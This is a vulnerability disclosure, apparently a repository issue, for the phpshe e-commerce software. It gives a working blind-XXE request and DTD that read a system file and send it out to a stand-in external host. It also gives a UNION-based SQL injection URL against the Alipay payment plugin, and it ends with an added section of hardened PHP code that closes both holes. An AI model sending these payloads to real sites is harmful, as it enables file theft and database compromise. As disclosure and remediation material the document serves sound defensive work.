
koyshe / phpshe

Two vulnerabilities without authentication

To do
Created by wps2015

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, where the wechat_getxml function is called.

The wechat_getxml function is defined in hook/wechat.hook.php; it then calls the pe_getxml function.

The pe_getxml function is defined in include/function/global.func.php. It calls simplexml_load_string() to parse the XML read from php://input. If the libxml version is < 2.9.0, simplexml_load_string() will resolve external entities in its default mode.

The PoC is as below:

/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>

test.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;

We can use it to read any file in the system.

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.


Then the return value of order_table is directly concatenated into the SQL statement as the table name.

So the PoC is as below:

/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_

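For reference, the following is an added example of how the two sinks described in this report can be closed; it is not phpshe's own code, and the function names and the table map are hypothetical. The XML parser refuses DTDs and never resolves external entities regardless of the libxml version, and the table name is chosen from a fixed allow-list instead of being built from the request parameter.

```php
<?php
// Added example, not phpshe's own code: hardened counterparts to the two sinks
// discussed in this report. Function names and table names are hypothetical.

// 1. Parse untrusted XML (a payment callback body from php://input) without
//    resolving external entities, whatever the libxml version.
function safe_getxml(string $raw): ?SimpleXMLElement
{
    // Cheap pre-check: a payment notification never needs a DTD, and every
    // XXE payload has to declare one.
    if (stripos($raw, '<!DOCTYPE') !== false) {
        return null;
    }
    // On PHP < 8.0 external entity loading is controlled by this switch;
    // PHP >= 8.0 disables it by default and deprecates the call.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $prev = libxml_use_internal_errors(true);
    // LIBXML_NONET forbids network access during parsing; LIBXML_NOENT is
    // deliberately NOT passed, so entities are never substituted.
    $xml = simplexml_load_string($raw, SimpleXMLElement::class, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    return $xml === false ? null : $xml;
}

// 2. A request parameter must never choose a table name: table names cannot be
//    bound as prepared-statement parameters, so map the client-supplied id to
//    a fixed allow-list and reject everything else.
function safe_order_table(string $id): ?string
{
    $tables = [            // constructed map; real names come from app config
        'pay'   => 'pe_order',
        'trade' => 'pe_trade',
    ];
    return $tables[$id] ?? null;
}

// Demo with constructed inputs: the benign body parses, the body carrying a
// DTD is rejected, and only allow-listed ids yield a table name.
$benign  = '<?xml version="1.0"?><xml><out_trade_no>pay123</out_trade_no></xml>';
$hostile = '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x "y">]><r>&x;</r>';
var_dump(safe_getxml($benign) !== null);
var_dump(safe_getxml($hostile));
var_dump(safe_order_table('pay'));
var_dump(safe_order_table('pay` where 1=1 union select 1#'));
```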